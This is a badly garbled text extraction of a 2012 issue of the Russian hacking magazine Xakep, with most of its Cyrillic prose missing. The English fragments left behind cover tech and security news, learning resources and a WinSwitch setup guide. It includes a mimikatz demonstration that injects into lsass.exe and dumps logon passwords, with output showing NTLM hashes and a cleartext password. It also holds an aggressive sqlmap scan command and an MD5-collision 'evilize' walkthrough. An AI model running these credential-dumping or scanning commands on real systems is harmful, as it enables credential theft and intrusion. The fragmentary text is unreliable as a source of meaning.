Хакер 2012 04 PDF

ANDROID
111
WWW.XAKEP.RU
04 (159) 2012
DuckDuckGo:
Google
,
TRUECRYPT
: 230 .
024
:
,
,
084
SHIM ENGINE:

056

ASP .NET
018
Intro
nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)

PC_ZONE UNITS
UNIXOID SYN/ACK
MALWARE
PR-

step (step@real.xakep.ru)
(petya@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(vagizova@glc.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-
(alik@glc.ru)

PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906

-

.: (495) 935-7034, : (495) 545-0906
-
, , , ,
. - , , .
,
!
, .
:
, -,
.

- . , ,
-.
,
, .

,
, .
nikitozz,
. .

TECHNOLOGY

(zinaidach@glc.ru)
(filatova@glc.ru)
(olgaeml@glc.ru)
(melnikova@glc.ru)
(kachurin@glc.ru)
(polikarpova@glc.ru)
( )
(tatarenkova@glc.ru)

(gospodinova@glc.ru)
(dubrovskaya@glc.ru)
-
(bulanova@glc.ru)
(korenfeld@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)
:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002.
Scanweb, . 219 833 .
P.S. ,
,
, .
!
.
. ,
, . .
.

: content@glc.ru.
, , 2012
04/159/ 2012
001
Content
008
HEADER
004
011
MEGANEWS

hacker tweets
-
016
017

Proof-of-concept
: Windows
COVERSTORY
024
COVERSTORY
018

1100
RECON SCOUT XT
:)
056
116
PCZONE
030
036
040

IT, ? !
!

Google .
10 DuckDuckGo.com
UNIXOID
102
106
111
044
050
056
060
064
068
072
Easy-Hack

ASP.NET:

ELMAH
Mail.Ru

- :
X-Tools

SYN/ACK
116
122
128
080
!
:

134
139
140
143
088
092
096
100
Shim:
Shim Engine

True-
TrueCrypt

,

WMI:

!

Edifier MP15 Plus
144
084

VDI Win2k8R2 Linux

Samba

IT- Microsoft: 2012
FERRUM
MALWARE
074

,

kobjects, sysfs, udev, udisks upower

Android-:
CyanogenMod vs MIUI
134
FAQ UNITED
FAQ
8.5
WWW2
web-
MEGANEWS

BITTORRENT -
BitTorrent, -
, .
, ,
,
BitTorrent. , , .
,
BitTorrent Live. ,
.

. BitTorrent Live 99%. ,
, CDN, . -
live.bittorrent.com, , BitTorrent Live
.
,
. ,
Netflix Hulu.

.
,
MPAA, RIAA

,
.

,

,
, ,
,
.

,
SSL-.
HTTPS
.
004
WINDOWS 8 ,

.

.

,

.
PASTEBIN
.
31
13
DNS-.
, Anonymous,

. ,

(pastebin.com/
NwN8ehFW)
,
Gmail-
.
Ars Technica
. , Xbox, PS3 iPad
. ,
() (, ,
Xbox Kinect),
.
( Xbox Live) . Ars Technica
, Microsoft , ,
-,
Xbox Live Skype.
ANDROID MARKET
.
Bouncer

.
FOXCONN
SWAGG SECURITY.
, ,
,
Apple
TPB.
04 /159/ 2012
01
02
03
READER@GLC.RU
.
04
MEGANEWS
vk.com.

TRENDNET
, IP-

!
GOOGLE
AUGMENTED REALITY
- ,
Google , ,
. ,
,

Wi-Fi Bluetooth. , Google, . ,

, Google . , ,
, , .
, ,
. , ,
Google - ,
Google Glasses.
New York Times,
.
: , , iPod nano.
, , Google
Heads-Up Display (HUD).
, . ,
.
, 9to5google.com ,

. ,
,
,
. , 9to5google.com :

.
HUD-. , ,
. , Android-,
NYT, .
Wi-Fi Bluetooth 4.0. ,
Google. ,
, ,
. ,
GPS , -, Android.
, ,
3D. , , ,
9to5google.com, .
. , , Android-. : , Google .
Trendnet , 2010

26
,

,

.
Trendnet
.
. 1.1.0 (build 104)
,
Trendnet
IP-: IP-
15 ,
. .
( ), /anony/mjpg.cgi,
. , :
http://192.168.1.3/anony/mjpg.cgi, ,
IP- 192.168.1.3.
, , Pastebin
1 000 IP-, Reddit.
IP-
shodanhq.com, .
[netcam].
GROUP-IB

2011

HOSTING MEDIA.
006
04 /159/ 2012
MEGANEWS
20 ( ) Google Chrome 17.0.963.46.
SYMANTEC ,

ANDROID-
. Recon Robotics, .
, 31
1 100
Recon Scout XT. 13.9
. ,
Recon Scout XT
.
,

,
Recon Robotics. , 315
, .
-? Recon
Scout XT
,
.
36 .
Recon Scout XT .

(youtu.be/5fzi7fxknIc)!
, Recon Scout XT , .
Symantec
RootSmart,

.
Android Market , ,
. RootSmart
,
IMEI, IMSI, ID , locationarea code
.
RootSmart Ginger Master,
Gingerbreak. , , RootSmart
root-, Gingerbreak . Root-
shells.zip
.

Droid Live,

.
, , , .
,
1 600 9 000 .
110-140 .

C&C-. ,

2011 .
WEXLER.BOOK T7007
ANDROID 2.3

WEXLER.BOOK T7007, Android 2.3. : 7"
LED- Multi-Touch,
ARM9, c 1,2
Wi-Fi (IEEE 802.11
b/g/n) 150 M/.
3700 .
008
8 ,
32
MicroSD. WEXLER.BOOK T7007
G-, USB- (USB OTG).
.

4999 .
04 /159/ 2012
MEGANEWS
BUG BOUNTY: Google 410 . .

( ,
)

Virtual Human Interaction Lab (vhil.stanford.edu).
,
, . , ,
, .
Knowledge Stream (knowledgestream.ru).
, . , ,
,
.
HD- .

. 20-
,
,
,
.
:
,
, Skype,
.
, ,
, .
, , , . ,
, ,
, ,
, 90%.

, .
. , ,
, , ,
(
) , ,
,
.
, Knowledge
Stream
. ,
- Electronic
Frontier Foundation, ,
. ,
.
Knowledge Stream
2011

Digital October. Knowledge
Stream
,
.
!

-
.

.

- !

010
,
! ,
!

2011
,
: 4 ,
0,4 , CO 5 .
04 /159/ 2012
#hacker tweets
@n00bznet:
./sqlmap.py -u http://url/ --crawl=5

--level=5 --risk=3 --threads=10 <~
,
!
:
, sqlmap
SQLi-.
@ChrisJohnRiley:

:)
@FirefoxNightly:
ASLR
dll- ( )
-ASLR
http://t.co/IQFdZrZ4
:
Firefox, ...
@pa_kt:
CVE-2011-2371
(Firefox reduceRight) -ASLR :
http://t.co/3uNU3Jjj
@RomiSphinX:
: ,
, -
. ()
<3
:
(.
Richard Phillips Feynman; 11 1918 15
1988) .
.
. 19431945
.
:
:
, ,
,
...
@corelanc0d3r:

, , :)
... !

Firefox DEP ASLR.
ASLR ROP
-ASLR ,
dll
ROP- dll.
@mathias:
JavaScript: try { x; }
catch( _
_ ) { console.
log('CODE, Y U NO WORK '); }
http://t.co/RTJaNUij
:
@FreedomCoder:
.
...
-
JavaScript.
,
:)
@geovedi:
,
- ,
.
@clarkysj:
, 5 , 18 -
6 - ,
.
, .
@thealuc:
,
-: >(tee
-a ~/.bash_history | logger -t $USER[$$]
$SSH_CONNECTION)
04 /159/ 2012
@daveaitel:
@joshcorman:
: White
Paper
-
---.
@f1nux:
, ...
, SSL.
. ...
:
, SSL ,
. ,
,
.
WP ftw!
SYSTEM
( )
?
! Symantec pcAnywhere
12.5 .
@i0n1c:
80
, , ,

- .
@evacide:
011
MICROSOFT STORE EVIL SHADOW TEAM. , .
MEGANEWS
ANONYMOUS
QR-

Sonic
Experiences,
,

iPhone
Android.

QR-, . , , .
, , ,
- , ,
. Sonic Notify (sonicnotify.com), , ,
QR-. .
, iOS Android
. , Sonic Notify
. ,
, .
, ,
, ,

. , , , . ,
- ,
:).

220 000

.
012
15 YOTA LTE,

2500-2530 2620-2650
. WiMAX LTE
14 15
.

:

.

Anonymous, , ,
.
. ,
-
-. --, -
!
Anonymous ,
. YouTube,
: youtu.be/pl3spwzUZfQ.

- ,
(pastebin.com/8G4jLha8).
, .
- , .
,
.

MEGAUPLOAD, 19 ,

2-3%,
DeepField Networks.
DDOS-

NASDAQ,
BATS
LONGwave99.
99%.
04 /159/ 2012
MAC OS X 10.8 Mountain Lion ( ) 2012 .
RAPIDSHARE
GOOGLEWALLET
PIN
egaUpload , ,
RapidShare .
RIAA MPAA,
.
- , TorrentFreak
.
:
RapidShare
, .
anti-abuse department.
, , , RapidShare.
,
. ,
. , , .
2010 , Dutko,
RapidShare. Dutko
RapidShare.
. , ,
.
Google Wallet
2011 .
Android-, NFC.
.
Google Wallet

. , .
,
.
.

. Google , Google
Wallet , , Secure Element,
. , Google Wallet
.
, , ,
, .
, PIN-
, Google!
.
, zveloLABS,
sqlite3, Google Wallet . metadata. ,
.
gmad_bytes_are_fun

.
, , .
deviceInfo,
, .
Protocol Buffers. .
,
messageformat .proto (Protocol BufferBasics: Java).
.proto,
. Unique
User IDs (UUID), Google (GAIA)
Cloud to DeviceMessaging (C2DM, -),
Google Wallet Setup, TSA (,
Trusted Services), SE,
CardProduction Lifecycle (CPLC) PIN-!
PIN-
SHA256. PIN- ( ),
10 000 SHA256,
. PIN-
,
,
Google Wallet .
zveloLABS , Google
. ,
, :
youtu.be/P655GXnE_ic.
RapidShare
:

Dropbox',
,

.
VLC
2.0 TWOFLOWER.
:

BLU-RAY .
04 /159/ 2012
013
MEGANEWS
GOOGLE CHROME BETA ANDROID 4- . , flash.
SSL
TWITTER
BLOGGER
Google

SSL-

Chrome.

,
.
, Twitter ,
,
. Twitter.
, , ,
. ,
Twitter ,
. ,
. ,
, Anonymous. Twitter .
, ( )
, ,
.

. -
.
Google
, , Blogger,
. , Google
.
SSL .
Trustwave
.
Bugzilla, mozilla.dev.security.policy.

, .
,
, man-in-the-middle
SSL/TLS.
Mozilla ,
Firefox
Mozilla,
HSM.
27 . , Mozilla
.
WOLFRAM ALPHA
,

,
. Wolfram Alpha
Pro. Pro-
4,99$
(2,99$ ),

14 .
014
OCCASSIONAL
GAMER,

Windows Phone 7 (55%) HTC.
Samsung (28%), LG (12%)
Nokia (4%).
INTEL Core i5-2380P, i52450P i5-2550K Sandy Bridge.

GPU.
04 /159/ 2012

THE PIRATE BAY

, ,
.

, . .
, .

2008 .
, , ( , ).
, The Pirate Bay .
, 2010 ,
4, 8 10 , 46 (
6,8 ). , ,
, .
,
( ,
) TPB , . ,
. ThePirateBay.org
, ,
( ,
,
), .
, .SE, .
, .
TPB
magnet- torrent-.
, torrent- (,
, - , ), . ,
.
torrentfreak.com :
, 164
, 90 ! , . , ,
- .
, The Promo Bay.
(, ,
) ,
The Pirate Bay. ,
SOPA ,
, P2P. , ,
, , .
.
04 /159/ 2012
015
HEADER

, .
.
. ,
(
), .
. ,
,
, , . :
-

- ? ,
- :
-
Ubuntu

.
Vagrant
(vagrantup.com).

Oracle's
VirtualBox (4.0.x 4.1.x), Vagrant

.
,
. downloads.
vagrantup.com
( Windows, Linux, Mac OS X)
(
):
$ vagrant box add lucid32 http://files.
vagrantup.com/lucid32.box
$ vagrant init lucid32
$ vagrant up

(,
, VirtualBox)! ,
016
box add < >

.

box- ,
.
, : Vagrant
.
init ,

: 32-
Ubuntu Lucid (10.04).
512 .
vagrant up
.
.
Vagrant. :
Vagrant
vagrant suspend
,
:
vagrant status
SSH, Vagrant:
vagrantbox.es

vagrant ssh
,
.
(,
IP),
Vagrantfile, Ruby.
, ,
. , ,
box-, .
Ruby
04 /159/ 2012
Proof-of-Concept

WINDOWS
,
.
? !
?
,
Windows-. Windows Credentials Editor
. mimikatz
(blog.gentilkiwi.com/mimikatz). ,
... .
, , . , ,
.
,
(
). :
mimikatz. ,
: ,
:
mimikatz # privilege::debug
mimikatz # inject::process lsass.exe sekurlsa.dll
mimikatz # @getLogonPasswords
mimikatz 1.0 x86 (pre-alpha)
/* Traitement du Kiwi */
mimikatz # privilege::debug
Demande d'ACTIVATION du privilge : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connect un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des donnes de scurits dans LSASS
mimikatz # @getLogonPasswords
Authentification Id
: 0;434898
Package d'authentification : NTLM
Utilisateur principal
: Gentil User
Domaine d'authentification : vm-w7-ult
msv1_0 :
lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
wdigest :
password
tspkg :
password
mimikatz
04 /159/ 2012
: , ?
, . wdigest (technet.microsoft.com/
en-us/library/cc778868(WS.10).aspx),
, , HTTP Digest Authentication
, ( ). ,
WCE. z
017
COVERSTORY
Sanjar Satsura (sanjar@xakep.ru, twitter.com/sanjar_satsura)
IT-

.
Stuxnet, ,

. .
018
04 /159/ 2012
DVD
WARNING
,
,

.

. ,

,

.
04 /159/ 2012
019
COVERSTORY

? , . , ,
, .
kernel.org: ,
, .
,
-, MD4, MD5 SHA-1.

( ). -. , , - ,
!

- ,
(). -
, - ,
. ? , .
, - F
x y , F(x) = F(y).
- F(x) = x|19|, . ( ,
) 19 ( 19),
. ,
. ?
-, 38, -
. F(x)
19, y y+19
-,

(/)
Davies-Meyer (c IDEA)
128
22
Davies-Meyer (c DES)
64
256
11
HAVAL (3 )
168
HAVAL (4 )
118
HAVAL (5 )
95
MD2
128
23
MD4
128
236
MD5
128
174
N- (12 )
128
29
N- (15 )
128
24
RIPE-MD
128
182
SHA
160
75
Snerfu (4 )
128
48
Snerfu (8 )
128
23
-,
020
-, y. , 38
- 57, 76 .
, (38,57), (38,76)
- F(x).
- F ,
,
- .
1. : - m
x,
F(x)=m.
2. :
m n, F(n) = F(m).
3. : , .

(,
, ).
- CRC, -,
.
, -,
.

. ( 32 ) ,
( : 128, 160 256 ),
.
C, CRC- 100 000 :
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#define INTERATION 100000
int main(){
int count =0;
int i,j;
unsigned hash;
char c;
unsigned* table;
table = calloc(INTERATION,sizeof(unsigned));
for(i = 0; i< INTERATION; i++){
hash = 0;
for(j=0; 32 > j;j++){
c = 33 + (char) (63.0*rand()/(RAND_MAX+1.0));
hash = (hash * 33) + c;
}
hash = hash + (hash >> 5);
for(j=0; i > j ;j++) if (table[j] == hash) count++;
table[i]=hash;
}
free(table);
printf("%d values %d collisions\n",INTERATION, count);
return 0;
}
- , -
. ,
04 /159/ 2012
IV , L1 L2 . ,
A
C
D
=
=
=
=
0x12AC2375
0x3B341042
0x5F62B97C
0x4BA763ED

AA1DDABE
1006363E
98A1FB19
1326ED65
D97ABFF5
7218209D
1FAE44B0
D93E0972
BBF0E1C1
E01C136D
236BB992
D458C868
32774244
9DA64D0E
6B7A779B
6B72746A
2^9 32-
,
. ,
( ).
VeriSign
: MD4 MD5.
MD5 ,
MD4.
.
,
.
, F .
G = XZ v (Y not(Z)) ( XY v XZ v YZ). , -
.
2 3. ( :
ASCII 5 0x3516 = 0001101012
4 0x3416 = 0001101002)
. .
128- (16-) MD5-:
MD5("md5") = 1bc29b36f623ba82aaf6724fd3b16718
, MD5,
(F)
. , , ,
, . C
: MD5(IV,L1) = MD5(IV,L2),

,
. ,
/ -. , , ,
,
.
MD4/5, .
1. :
, ,
.
2. :
,
.
3. RainbowCrack:
;
,
, .
, , : PasswordsPro,
MD5BFCPF, John the Ripper.
WWW
STUXNET
, Stuxnet,
- ,

? -
,

JMicron Realtek. ,
.
Stuxnet
Duqu. C-Media Electronics, .
, ! ,
, .

. , ,
,
04 /159/ 2012
:). ,
, . -,
,
(
orr,
-, -:
woodman openrce),
. Duqu,
(c )
. -,
( , Duqu) ,
, ,
15 ! , ,
.
,
-.
MD5:
bit.ly/awBxKK;

():
bit.ly/byRrQu;
MD5 Collision
Generator:
bit.ly/zLR5Ec;
Evilize:
bit.ly/zEBLmj;
Rainbow MD5 Crack
by Collision Search:
bit.ly/yYRUxl;

MD5:
bit.ly/yDQNuY;
HashClash Framework:
bit.ly/722ob;

:
bit.ly/ztdpHg.
021
COVERSTORY

, .

,
.
1. CR2-KK , .
2. CR1-KK .
3. CR0 .

:
1. CR2-KK .
2. CR1-KK ,
.
3. 0 .

. HEX (
-
), hex-
:
1-
hello-erase.c, .
,
goodevil.o:
gcc hello-erase.c goodevil.o -o hello-erase
d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f89
55ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5b
d8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0
e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70
2-
d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f89
55ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5b
d8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0
e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70
MD5 , !
. MD5
Collision Generator
CR2-KK. .
15 ,
! , .
, - evilize (
). : evilize, md5coll
goodevil.o. -
:
md5sum ./hello-erase
23d3e4873e3ea619c7bdd6fa2d0271e7
/home/satsura/md5coll/source/evilize/hello-erase
, MD5-:
./md5coll 0x23d3e487 0x3e3ea619 0xc7bdd6fa 0x2d0271e7 > \
init.txt
evilize MD5-.
,
:
./evilize hello-erase -c init.txt -g good -e evil
du -sh ./evil ./good & md5sum ./evil ./good
8,0K
./evil
8,0K
./good
d8bf211b61624d331fe06c75bd6e3c89 ./evil
d8bf211b61624d331fe06c75bd6e3c89 ./good

MD5,
, .
1996
022

(Wang Xiaoyun), (Feng Dengguo),
(Lai Xuejia) (Yu Hongbo)
,
(1 IBM p690).
2004

,
128 ,
MD5-.
2005
04 /159/ 2012
./good
Hello, world!
./ evil
This program is evil!!!
Erasing hard drive...1Gb...2Gb... just kidding!
Nothing was erased.
, Hello, world!,
. hello-erase.c ,
,
.
, CR1-KK.
CR1-KK

Unicon, (- ) . ,
CR1-KK-collision keygen ,

- .
, . , : 000000.

.
,
, CRM- ( , E-hujjat
).
, :
C:\coll_test> md5sum *
b2d1a3f63f9784e0fe8c237ff2484a78
key
a654bd700b5e6cf47ca0b042b2f30575
c5d6aaa28639316614e3d95987fcb612
a654bd700b5e6cf47ca0b042b2f30575
*key((faked by collision).
*cer(faked by collision).cer
*pfx(faked by collision).pfx
*cer.cer
, cer.cer cer(faked by collision).cer

.
, MD5- . . ,
-. , ,
. :
, .
, 128-
.
, MD2, MD4, MD5, DES, DES-IDEA, RIPEMD, HAVAL(~128, ~256), SHA-1, 34.10-2001 .
. z

,

(A,B,C,D) ,
.
2006
04 /159/ 2012

, MD5-.
2007

evilize

(Authenticode digital signature), authenticode
Microsoft
.
2009
023
COVER STORY
.

.
Wi-Fi
VPN Windows.
,
Almaz Capital Partners,
, .

.

. .
, .

, ,
.
.
. ,
, ,
, .
.
, , , .
,
. , :
.
, ,

. , ,
. 1972 !
, , ,
.
, ,
: . .
:

... , ,
,
,
, .

. ,
, , ,

024
.
... .
.
, ,
.

:
. ,
:
, , ,
,

.
, . , , .
,
,
. ,
.
,
,
.
, , , :
, ,

. , 10%
,
.
: , .
, :
, , ,
... ,
. ,

, . - -
, .
, -.
SUN
Sun
Microsystems 1990 .
, . ,

,
, .

,
.
,

. -
. -
,
. - .
22- ,
.
- 8 ,
, 22 !
,

.
: ,
. ,
,
.
, Sun
, SPARC-
.
, Sun . 1990
,
.
, -...
,
Sun . ,
SPARC ?
SPARC , ! Intel
, SPARC .
, : , .
, , .
: ? :).
1991 ,
-
.
. ,
,
, ,

04 /159/ 2012

30

Almaz

s, er
rtn
Pa
al
pit
,
Ca

war, Alter Geo
Ala
ls,
Paralle

04 /159/ 2012
025
COVER STORY
, . :).
-
, .
Sun
. IBM, HP...
: , ,
. , Sun,
.
, - ,
... : ,
,
! - IBM HP. .
Sun 15
, 25
000 . ?
. .

,
. :
,
.
... .
.
WI-FI
80- IP . Unix- ,
IP-
. ,
PDP DEC, , ,
.

,
.
. .
Sun. : 802.11,
,
PCMCIA-?. ,
...
802.11 , , . Internet Engineering
Task Force. , , -
. Wi-Fi ,
. , .
Motorola, ,
. : Sun
. , - ,
.
. Sun ,
.
-.
026
1993 PCMCIA- Wi-Fi, 4 /c. Interop .

Wi-Fi
! , . Sun
,
Ericsson,

. Ericsson HP LX
, .
. , ,
--, . 19.2
/ .

. :
? .
!, CEO Ericsson,
2003-2004 .
Sun
. -
, .
Solaris ,
. ,
,
. ,
, , .

90- ,
,
, - ,
, . ,
. .
VPN,
, .
,
+, (
) .
Sun,
.
. ,
- Microsoft
- 90- .
.
: , -
-....
, ,
.
: - , ,
.
,
, .
. - , :
, .

,
(, ,
- ). ,
, ,
. ,

,
,
. .
.
, - , . ,
, VPN,
,
. , Sun Windows
: , , Windows!.
NDIS-,
Microsoft . ,
, , VPN.
Sun Screen E+
.

. ,
- , - ,
.
, .
.
,
, ,
,
- .
,
... ,

20 30 .
,
, , , ,
, 40-50
:). , ,
, . 1000%,
Google - ,
5-, 10- .

( repeated entrepreneurs),

, . ,
04 /159/ 2012
,
, , ,
.
,
,
.
Almaz 2
- ,
.
, - . -
,

. .
,

.
,
. ,
. . ,
.
... ,
.
, ,
...
, .
?
,
. , .
, - , .
. , ,
,
. ,
, ... .
, ,
. ,
.

WI-FI
,

.
. , e-commerce,

. - ,
( ,
) , .

e-commerce ,
- .
.
,
, .

, -
.
:
, . : ,
.
(
, ),
04 /159/ 2012
, , ,
. : , , ,
, , .
-.
. - . , , -
-,
, .

, ,
. , : ,
: ,

.
, , .
, -
, .
- ,
: - , , ,
,
. : ,
, ,
- .
, ,
.
, .
Google... , , Microsoft IBM.
,
: Apple, Google, Facebook
Amazon. , Microsoft.
,
.
, , ,
, .
, . ,
. , ,
,
.
:
. ,
. -
,
.
CEO, ( , )
.
. .
. ,
, ,
.
: , ? ,
, ?
-
, - .
?
?.
: , .

HR ,
, ,
. .
, ,
, ( ),
, ,
.

, ,

.
.
027
COVER STORY
. ,
.
.
.
.
.
Google. 2009 2010 ,
42 .
400 .
... ,
25 . , -
, - . . 10-30. 2-3
. ,
25
3, 8-10 . 10 ,
,
30% .
300 3 ,
. 300 ,
, . , . , .
.
, .
go global,
( Parallels, ,
) . ,
, , -,
,
,
, . -,
.
,
. , ,
. ,
: , -
- , - .
. .
,
(Famatech
RAdmin, ,
),

. , , ,
,
. .
IT- ,
. .
,
1 10
.
.
.
, , , ,
. , ,
JetBrains ,
. , ,
40-60
, . ,
.
,
.
,
. ,
.
, ...
, .
? , , , -
.
... .
, ,
.
-.
,
.
, ,
.

. , . ,
, .
OpenFlow,

CRAZY

,

.
028

.
!

,

20-30% ,
.
SoftwareDefined Networking.

.
, .
,
.
,
,
.
.

. , ,
.
, . ,
. ,
,
,
,
.
, : .
, ,
, (
),
.
.

. ,
, :
,
-. , . ,
. ,
,
,

. , ,
! , , ,
,
.
,
, .
,
. -
,
, : ,
, , .
.

, , .
- ,
, - ,
. , ,
.
. , ,
,
. , .

. z
04 /159/ 2012
Preview
30 .
.
PCZONE
30

.
,

,

.

,

.
-,
,
.
PC ZONE
36
!

WIndows- Linux
? ,
WinSwitch.
60
MAIL.RU

. ,
,
.
04 /159/ 2012
40
GOOGLE ,
Google .

DuckDuckGo,
.
56

ASP.
NET ,
web-,
. .
MALWARE
74

.
.
80

,
.
029
PC ZONE

IT,
? !

. .
IT,
.
, ,
-.
,
, .
IT .
030
,

.
.

. , , ,
, .
, .
, .
04 /159/ 2012

,
.
, ,
,
, .
, : -
IT-
,
. .

. .
.
, ,
:).
,

. ,
,
, .

, ,
.
LINGUALEO
TED.com),
(
) .
,
. ,
. ,

. ?
, LinguaLeo

,
.
,
.
, -,
, -,
. ,
,
.
, , -
. , ,
.
, ,
,
.

(, iTunes),
.

, .
(ai-class.com),
(db-class.org).
, .

PDF-,
. ,
, :
(securityclass.org);

(security-class.org);
(cs101-class.org);
(cs101-class.org);
(cs101-class.org);
,

( ).
.
,
, , ,
. ,

, - . , ,

.
,
6.002x:
.
. ,
,
, . -
,
Scheme
Structure and Interpretation of
Computer Programs. . ,
, .
: ,
. . :

, -,
. - ,
, ...
,
LinguaLeo.ru, .
,
,
(, -
, , .

, ,
.
,
.
,
,
-.
:
(ml-class.org), -
MITX

MIT .
MITx
-. -
04 /159/ 2012
031
PC ZONE
JavaScript
,
,
.
: ,
. -
: Python, Ruby ( Ruby on Rails)

, , JavaScript (HTML5). .
-

JS,
.
JavaScript :
,

Linux (bellard.org/jslinux).
:).
CODECADEMY
.

, , ,
,
.
,
- .
, , JavaScript.
,
.

.

Codecademy.
UGC (User-generated content)

.
www.codecademy.com
:
? .
.
, .
, 21 ,
.
Codecademy ,
.

( !) ,
JavaScript.
JQUERY

learnjquery.tutsplus.com
JavaScript
jQuery,
HTML-, ,
AJAX.
jQuery
JavaScript. .
,
JQUERY
codeschool.com/courses/jquery-air-first-fligh
,
, -
c<>de school.
,
,
. jQuery
Air: First Flight ,
.
, -
032
Nettuts+, ,
.
-
, .
,
. :
,

. ,
JS,
(bit.ly/AqK4s0).

, .
(, 350 ). -
, , .
JavaScript, ,
CSS-,
HTML- DOM,
.
,
.
04 /159/ 2012
Ruby Ruby on Rails

, ,
,
Ruby on Rails.
,
-,
. ,
.
,
, Ruby Ruby on Rails
.
.
RUBYMONK
.

( , , ,

).
, . ,
,
, ,
.
rubymonk.com

, ,

Ruby. :
. .
- ,
.
,
TRY RUBY
tryruby.org
- ,

Ruby
, . ,
THE INTRO TO RAILS SCREENCAST I

WISH I HAD
bit.ly/zqLVPH
, Ruby
- Ruby On
Rails.
,
Twitter.
tutsplus.com
RAILS FOR ZOMBIES

railsforzombies.org
( !)
Rails
-,
c<>de school.
04 /159/ 2012
, ,
. Ruby
:
,
Metasploit ( ) Ruby.
, try ruby . ,
, ,
.

. ,

c<>de school. .

Rails, . 40-
, Rails.
Models, TDD, ActiveRecord,
RSpec, Capybara, Partials
.
:

railscasts.com.
,
, ,
,

.
, Rails
for Zombies 2,
.
033
PC ZONE
Python
Python

.
.
Python
PYTHON!
trypython.org
- Python.
JS Ruby, ,
,
.
- PYTHON
onlinepythontutor.com

.
, ,
Python,
(-) -
PYTHON GOOGLE
code.google.com/edu/languages/googlepython-class/index.html
Google , Python.
,
, (,

. ,
:
, Python,
.
:
, -
,
.
, Python
,
.
.
:
.
: Try
Python ,

. ( Python
IronPython). ,
Silverlight.

(, ,
). ,
, ,
Python MIT.
, ,
. .
-,

-
, I/O- . ,
.
).
.
, ,

.
Python (
),
, ,
HTTP-. ,
Google
.
!
,
,
, .
,
,
, ,
034
,

NoSQL
.
Haskell: tryhaskell.org;
Scala: simplyscala.com;
Erlang: tryerlang.org;
Clojure: try-clojure.org;
MongoDb: try.mongodb.org;
RedisDb: try.redis-db.com;
C#: bit.ly/A4HR9m;
SQL: sql-ex.ru.
04 /159/ 2012
PC ZONE
Ant (zhukov.a@real.xakep.ru)
!
- .
.
-

. WinSwitch
.
WINSWITCH?
,
, , ( ). ,
Ubuntu,
Windows Ubuntu.
, ,
. - , ,

. RDP VNC
, ,
.
,
?
? ,
. WinSwitch!
? - ,
, .
, , . ,
Microsoft Word , ,
Visual Studio ,
. ,
036
, .
: Windows
Ubuntu,
(
). Visual Studio.
, .
, , , WinSwitch . , Ubuntu Natty Narwhal

(11.04) Windows XP.
Windows. :
winswitch.org , .
mDNS-
( mDNS )
( , , ),
.
Linux. , ,
Ubuntu, , ,
. ,
:
sudo su wget -O https://winswitch.org/gpg.asc | apt-key add -
04 /159/ 2012
WinSwtich
ant-vb
echo "deb http://winswitch.org/ natty main" > /etc/apt/

sources.list.d/winswitch.list
apt-get update
apt-get install winswitch
. , , listen_on, ,
. , ,
,
listen_on="*:32123" ( ,
32123
).
allow_root_logins,
False. ,
/ . allow_root_authentication
, . . mDNS
settings / mDNS,
,
,
.
WinSwitch : ( ). ,

. ,
.

mDNS.
,
.
,
. ,
. *nix ~/.winswitch/server/server.
conf, Windows *\Application Data\Window-Switch\server\server.
conf. . , ,
:
# Identity
ID="8796747538515"
name="testpc"
type="workstation"
. ,
04 /159/ 2012
WinSwitch
037
PC ZONE
Ubuntu VNC
, ""
,
.
mDNS_publish False,

.
, , ,
mDNS_publish_username. , , - .

,
.
-
- .
. Windows XP.
Window-Switch. ,
. . Ubuntu.
Internet WindowSwitch.
, . , , testpc ID=8796747538515.
, ,
user.
, , ant-vb
ant .

. , WinSwitch
Start Application Games Mines. ( ), .
, Mines Send to user on testpc.
. ,
. !
, WinSwitch , ,
. ,
Start Application Custom Command.
,
,
Open in Window Switch. ,
(Main Unix Display
VNC Copy).
( GStreamer).
,
. ,
, . , , , .
MDNS?
Multicast DNS (mDNS)

DNS ,
DNS-.
, mDNS
IP-
DNS. ,
, mDNS.
,
038
.

mDNS-
/.
(,
)
response- TTL = 0. mDNS
.local.
mDNS
Bonjour (Apple)
Avahi (Linux).
04 /159/ 2012
Avahi-
, Windows-
Windows- - Ubuntu
, .
. .
: *\Application Data\Window-Switch\
client\applet.log. ,
- . , .
, . , : ,
--debug-mode. ,
(C:\Program Files\WinSwitch) :
Switch-Server.exe --debug-mode
,
. , ,
Linux-. . :
winswitch_server --debug-mode
:
[EE] 2012/23/02 19:13:18 WinSwitchServer.check() running
as root (uid=0) is currently broken
.
, (
). ,
.
.
, [DD] ( ). ,
. , - ,
traceback. ,
:
AvahiPublisher.__init__(Window Switch for ant on
ant-vb,32123,_shifter._tcp.,,,['username=ant', 'ssh_
tunnel=False', 'version=0.12.11', 'ID=8796747971533'],-1)
04 /159/ 2012
. Avahi , .
,
, , .
Mac OS X (Rendezvous, Bonjour)
. Avahi mDNS flexmdns.
mDNS, mDNS ,
. , Avahi .
, , :
avahi-daemon
Service ant-vb (/services/udisks.service) successfully
